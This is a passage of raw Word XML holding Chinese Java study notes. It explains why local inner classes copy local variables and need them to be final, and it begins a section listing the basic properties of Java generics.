      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-params"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-params"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRPr="00E129CB" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.obj = obj;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRPr="00E129CB" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRPr="00E129CB" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-function"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="268BD2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>displayLocvar</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-params"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRPr="00E129CB" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                                System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.println(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2AA198"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"locvar = "</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> + locvar);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRPr="00E129CB" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRPr="00E129CB" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRPr="003B6028" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
          <w:color w:val="268BD2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6028">
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
          <w:color w:val="268BD2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                Object in = new Inner(locvar);  //将locvar作为参数传给构造，以初始话成员</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRPr="003B6028" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
          <w:color w:val="268BD2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6028">
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
          <w:color w:val="268BD2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                return in; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRPr="003B6028" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
          <w:color w:val="268BD2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6028">
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
          <w:color w:val="268BD2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:ind w:firstLine="320"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>那么问题又来了，我们写代码的目的是在内部类中直接控制局部变量和引用，但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>这么整我们就不高兴了，我在内部类中整半天想着是在操作外部变量，结果</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6028">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>你给整个副本给我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，我搞半天丫是整我自己的东西啊？要是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>不这么整吧，由破坏了封装性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>--------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>你个局部内部类牛啊，啥都没有还能看局部变量呢。这不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>风格，肯定不能这么干。这咋整呢？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>想想，类的封装性咱们一定是要遵守的，不能破坏大局啊。但又要保证两个东西是一模一样的，包括对象和普通变量，那就使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>嘛，当传递普通变量的之前我把它变成一个常量给你，当传递引用对象的时候加上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>就声明了这个引用就只能指着这一个对象了。这样就保证了内外统一。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00117FF7"/>
    <w:p w:rsidR="00DD4B7A" w:rsidRPr="00BC40DA" w:rsidRDefault="00DD4B7A" w:rsidP="00117FF7"/>
    <w:p w:rsidR="00F90150" w:rsidRDefault="00F90150" w:rsidP="00F90150">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.2</w:t>
      </w:r>
      <w:r w:rsidR="00563FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  Java</w:t>
      </w:r>
      <w:r w:rsidR="00D73747">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛型原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D6D6F" w:rsidRDefault="002D6D6F" w:rsidP="009516BB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>泛型的本质是</w:t>
      </w:r>
      <w:r w:rsidRPr="00516D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参数化类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，也就是说所操作的数据类型被指定为一个参数。这种参数类型可以用在类、接口和方法的创建中，分别称为泛型类、泛型接口、泛型方法</w:t>
      </w:r>
      <w:r w:rsidR="005646DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005646DE" w:rsidRPr="005646DE" w:rsidRDefault="005646DE" w:rsidP="005646DE">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005646DE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005646DE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>、泛型的类型参数只能是类类型（包括自定义类），不能是简单类型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005646DE" w:rsidRPr="005646DE" w:rsidRDefault="005646DE" w:rsidP="005646DE">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005646DE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="005646DE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>、同一种泛型可以对应多个版本（因为参数类型是不确定的），不同版本的泛型类实例是不兼容的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005646DE" w:rsidRPr="005646DE" w:rsidRDefault="005646DE" w:rsidP="005646DE">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005646DE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="005646DE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>、泛型的类型参数可以有多个。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005646DE" w:rsidRPr="005646DE" w:rsidRDefault="005646DE" w:rsidP="005646DE">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005646DE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="005646DE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>、泛型的参数类型可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005646DE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidRPr="005646DE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>语句，例如。习惯上成为“有界类型”。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005646DE" w:rsidRDefault="005646DE" w:rsidP="005646DE">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005646DE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="005646DE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、泛型的参数类型还可以是通配符类型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D976AB" w:rsidRPr="00D976AB" w:rsidRDefault="00D976AB" w:rsidP="00D976AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
